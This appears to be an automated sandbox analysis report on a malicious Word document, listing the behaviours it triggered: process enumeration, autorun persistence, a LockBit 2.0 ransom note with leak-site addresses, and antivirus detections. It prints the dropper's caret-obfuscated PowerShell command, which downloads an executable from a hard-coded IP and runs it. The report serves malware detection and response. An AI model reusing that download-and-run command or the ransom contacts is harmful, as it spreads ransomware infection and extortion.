Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

powershell /W 01 curl http://195.201.101.146/12341rgergg435g4tr.exe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe;C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (26 events)

Time & API	Arguments	Status	Return
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: smss.exe process_identifier: 228	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: csrss.exe process_identifier: 364	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: svchost.exe process_identifier: 584	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: svchost.exe process_identifier: 656	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: svchost.exe process_identifier: 740	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: svchost.exe process_identifier: 796	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: audiodg.exe process_identifier: 916	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: spoolsv.exe process_identifier: 1036	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: svchost.exe process_identifier: 1080	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: taskhost.exe process_identifier: 1352	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: svchost.exe process_identifier: 1432	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: IMEDICTUPDATE.EXE process_identifier: 1492	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: svchost.exe process_identifier: 1908	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: pw.exe process_identifier: 1200	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: SearchIndexer.exe process_identifier: 736	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: tvnserver.exe process_identifier: 2664	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: tvnserver.exe process_identifier: 2740	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: pw.exe process_identifier: 2776	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: taskhost.exe process_identifier: 2920	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: SearchProtocolHost.exe process_identifier: 3020	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: SearchFilterHost.exe process_identifier: 204	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002d0 process_name: WINWORD.EXE process_identifier: 2188	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002cc process_name: sppsvc.exe process_identifier: 2496	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002cc process_name: cmd.exe process_identifier: 2656	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002cc process_name: conhost.exe process_identifier: 2588	1	1
Process32NextW Dec. 13, 2022, 10 a.m.	snapshot_handle: 0x000002cc process_name: 43et5rgr6hty6h76tuyr6t.exe process_identifier: 1364	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Dec. 13, 2022, 10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Dec. 13, 2022, 10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (1 event)

process

winword.exe

Communicates with host for which no DNS query was performed (1 event)

host

195.201.101.146

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{E7894974-2828-CFE0-79A7-7920B9D0E148}

reg_value

"C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe"

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

ClamAV	Doc.Downloader.e341431ebcbc3c3a-9980308-0
VIPRE	Trojan.Groooboor.Gen.37
VirIT	W97M.Dwnldr.BQJ
ESET-NOD32	DOC/TrojanDownloader.Agent.ARJ
Avast	Other:Malware-gen [Trj]
BitDefender	Trojan.Groooboor.Gen.37
NANO-Antivirus	Exploit.Xml.CVE-2017-0199.equmby
MicroWorld-eScan	Trojan.Groooboor.Gen.37
Ad-Aware	Trojan.Groooboor.Gen.37
Emsisoft	Trojan.Groooboor.Gen.37 (B)
McAfee-GW-Edition	Artemis
FireEye	Trojan.Groooboor.Gen.37
GData	Trojan.Groooboor.Gen.37
Antiy-AVL	Trojan/MSOffice.Embed.tempurl
Microsoft	Trojan:Script/Wacatac.B!ml
Arcabit	Trojan.Groooboor.Gen.37
MAX	malware (ai score=81)
Rising	Exploit.ExtLink/OFFICE!1.C97A (CLASSIC)
AVG	Other:Malware-gen [Trj]

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

winword.exe

martian_process

cmd /c pow^ers^hell/W 01 c^u^rl htt^p://195.201.101.146/12341rgergg435g4tr.e^xe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe;C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe

One or more non-whitelisted processes were created (3 events)

parent_process	winword.exe	martian_process	cmd /c pow^ers^hell/W 01 c^u^rl htt^p://195.201.101.146/12341rgergg435g4tr.e^xe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe;C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe
parent_process	powershell.exe	martian_process	"C:\util\curl\curl.exe" http://195.201.101.146/12341rgergg435g4tr.exe -o C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe
parent_process	powershell.exe	martian_process	"C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe"

Writes a potential ransom message to disk (2 events)

Time & API	Arguments	Status	Return	Repeated
NtWriteFile Dec. 13, 2022, 10 a.m.	buffer: LockBit 2.0 Ransomware Your data are stolen and encrypted The data will be published on TOR website http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion and https://bigblog.at if you do not pay the ransom You can contact us and decrypt one file for free on these TOR sites http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion OR https://decoding.at Decryption ID: F189D874E328CF936E6A1B64FFF0DD8D offset: 0 file_handle: 0x00000234 filepath: C:\GPKI\Restore-My-Files.txt	1	259	0
NtWriteFile Dec. 13, 2022, 10 a.m.	buffer: LockBit 2.0 Ransomware Your data are stolen and encrypted The data will be published on TOR website http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion and https://bigblog.at if you do not pay the ransom You can contact us and decrypt one file for free on these TOR sites http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion OR https://decoding.at Decryption ID: F189D874E328CF936E6A1B64FFF0DD8D offset: 0 file_handle: 0x00000234 filepath: C:\Restore-My-Files.txt	1	259	0

The process powershell.exe wrote an executable file to disk (22 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\util\curl\curl.exe
file	C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (4 events)

dead_host	192.168.56.102:49188
dead_host	192.168.56.1:445
dead_host	192.168.56.1:135
dead_host	192.168.56.102:49189

이상민.docx

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All